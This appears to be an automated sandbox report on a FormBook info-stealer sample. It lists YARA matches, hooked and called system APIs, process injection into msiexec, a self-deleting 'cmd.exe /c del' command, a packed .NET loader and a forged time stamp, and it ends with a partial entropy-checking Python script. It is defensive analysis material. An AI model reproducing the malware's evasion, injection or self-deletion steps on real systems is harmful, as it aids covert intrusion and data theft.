            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004181C0 NtCreateFile,2_2_004181C0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00418270 NtReadFile,2_2_00418270
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004182F0 NtClose,2_2_004182F0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,2_2_004183A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004181BB NtCreateFile,2_2_004181BB
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041826B NtReadFile,2_2_0041826B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041839A NtAllocateVirtualMemory,2_2_0041839A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00F398F0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00F39860
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39840 NtDelayExecution,LdrInitializeThunk,2_2_00F39840
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F399A0 NtCreateSection,LdrInitializeThunk,2_2_00F399A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00F39910
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A50 NtCreateFile,LdrInitializeThunk,2_2_00F39A50
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A20 NtResumeThread,LdrInitializeThunk,2_2_00F39A20
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00F39A00
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F395D0 NtClose,LdrInitializeThunk,2_2_00F395D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39540 NtReadFile,LdrInitializeThunk,2_2_00F39540
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00F396E0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00F39660
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39FE0 NtCreateMutant,LdrInitializeThunk,2_2_00F39FE0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00F397A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,2_2_00F39780
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,2_2_00F39710
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F398A0 NtWriteVirtualMemory,2_2_00F398A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3B040 NtSuspendThread,2_2_00F3B040
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39820 NtEnumerateKey,2_2_00F39820
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F399D0 NtCreateProcessEx,2_2_00F399D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39950 NtQueueApcThread,2_2_00F39950
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A80 NtOpenDirectoryObject,2_2_00F39A80
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A10 NtQuerySection,2_2_00F39A10
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A3B0 NtGetContextThread,2_2_00F3A3B0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39B00 NtSetValueKey,2_2_00F39B00
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F395F0 NtQueryInformationFile,2_2_00F395F0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39560 NtWriteFile,2_2_00F39560
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3AD30 NtSetContextThread,2_2_00F3AD30
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39520 NtWaitForSingleObject,2_2_00F39520
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F396D0 NtCreateKey,2_2_00F396D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39670 NtQueryInformationProcess,2_2_00F39670
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39650 NtQueryValueKey,2_2_00F39650
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39610 NtEnumerateValueKey,2_2_00F39610
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A770 NtOpenThread,2_2_00F3A770
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39770 NtSetInformationFile,2_2_00F39770
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39760 NtOpenProcess,2_2_00F39760
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39730 NtQueryVirtualMemory,2_2_00F39730
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A710 NtOpenProcessToken,2_2_00F3A710
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_00B38D5D0_2_00B38D5D
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_0133CAE40_2_0133CAE4
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_0133EEB00_2_0133EEB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004010302_2_00401030
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004012FB2_2_004012FB
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041CB862_2_0041CB86
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00408C5B2_2_00408C5B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00408C602_2_00408C60
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402D872_2_00402D87
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402D902_2_00402D90
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C59E2_2_0041C59E
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B69A2_2_0041B69A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402FB02_2_00402FB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00468D5D2_2_00468D5D
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC28EC2_2_00FC28EC
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A02_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC20A82_2_00FC20A8
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B0902_2_00F0B090
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A8302_2_00F1A830
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FCE8242_2_00FCE824
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB10022_2_00FB1002
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF2_2_00F199BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F141202_2_00F14120
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFF9002_2_00EFF900
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF2_2_00FB4AEF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC22AE2_2_00FC22AE
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B2362_2_00F1B236
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAFA2B2_2_00FAFA2B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA23E32_2_00FA23E3
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB03DA2_2_00FB03DA
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBDBD22_2_00FBDBD2
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2ABD82_2_00F2ABD8
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2EBB02_2_00F2EBB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1EB9A2_2_00F1EB9A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2138B2_2_00F2138B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AB402_2_00F1AB40
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F9CB4F2_2_00F9CB4F
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2B282_2_00FC2B28
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A3092_2_00F1A309
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB44962_2_00FB4496
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B4772_2_00F1B477
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBD4662_2_00FBD466
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0841F2_2_00F0841F
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0D5E02_2_00F0D5E0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC25DD2_2_00FC25DD
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F225812_2_00F22581
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D822_2_00FB2D82
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1D552_2_00FC1D55
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF0D202_2_00EF0D20
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2D072_2_00FC2D07
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2EF72_2_00FC2EF7
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F16E302_2_00F16E30
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBD6162_2_00FBD616
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1FF12_2_00FC1FF1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FCDFCE2_2_00FCDFCE
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: String function: 00EFB150 appears 139 times
            Source: YvGnm93rap.exe, 00000000.00000002.226831421.0000000000BD2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227438383.0000000003090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000003.226728460.0000000000CB6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000000.226123201.0000000000502000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000002.267167548.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs YvGnm93rap.exe
            Source: YvGnm93rap.exeBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
            Source: YvGnm93rap.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: YvGnm93rap.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@19/7
            Source: C:\Users\user\Desktop\YvGnm93rap.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvGnm93rap.exe.log
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
            Source: YvGnm93rap.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\YvGnm93rap.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: YvGnm93rap.exeVirustotal: Detection: 46%
            Source: YvGnm93rap.exeReversingLabs: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\YvGnm93rap.exe 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
            Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
            Source: C:\Users\user\Desktop\YvGnm93rap.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: YvGnm93rap.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: YvGnm93rap.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: YvGnm93rap.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: YvGnm93rap.exe

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0x87A8763C [Fri Feb 14 04:21:16 2042 UTC]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C952 push 06E61A6Ah; ret 2_2_0041C973
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C932 push 06E61A6Ah; ret 2_2_0041C973
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B3B5 push eax; ret 2_2_0041B408
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B46C push eax; ret 2_2_0041B472
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B402 push eax; ret 2_2_0041B408
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B40B push eax; ret 2_2_0041B472
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F4D0D1 push ecx; ret 2_2_00F4D0E4
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87823365772
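            The two static indicators above (a compile time stamp in the future and a .text section whose entropy is close to the 8.0 maximum) can be reproduced without a sandbox. The Python script below is an added example written for this page, not code from the report or from any tool it references: it parses only the COFF and section headers with the standard library, computes per-section Shannon entropy, and flags a time stamp later than the analysis date. The 7.0 entropy threshold, the fixed analysis date and the two constructed sample images (one mimicking the reported 0x87A8763C time stamp and near-8.0 entropy, one benign) are assumptions made for illustration.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone

ENTROPY_THRESHOLD = 7.0   # assumption: above this a section is almost certainly packed or encrypted
# Fixed reference clock so the "future time stamp" check is reproducible (assumed analysis date).
ANALYSIS_TIME = datetime(2021, 1, 18, tzinfo=timezone.utc)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


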